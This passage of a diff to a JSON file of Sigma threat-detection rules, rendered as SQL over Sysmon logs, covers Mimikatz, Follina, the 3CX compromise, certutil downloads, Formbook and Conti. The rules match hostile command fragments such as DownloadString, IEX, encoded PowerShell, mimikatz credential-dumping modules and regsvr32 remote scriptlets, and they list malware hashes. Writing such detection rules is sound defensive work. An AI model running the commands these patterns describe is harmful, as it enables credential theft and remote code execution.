'\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "status": "experimental", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + }, + { + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((OriginalFileName = '3CXDesktopApp.exe' OR Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1027" @@ -6786,18 +6616,18 @@ "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.resource_development", "attack.t1587.001" @@ -6807,90 +6637,86 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE 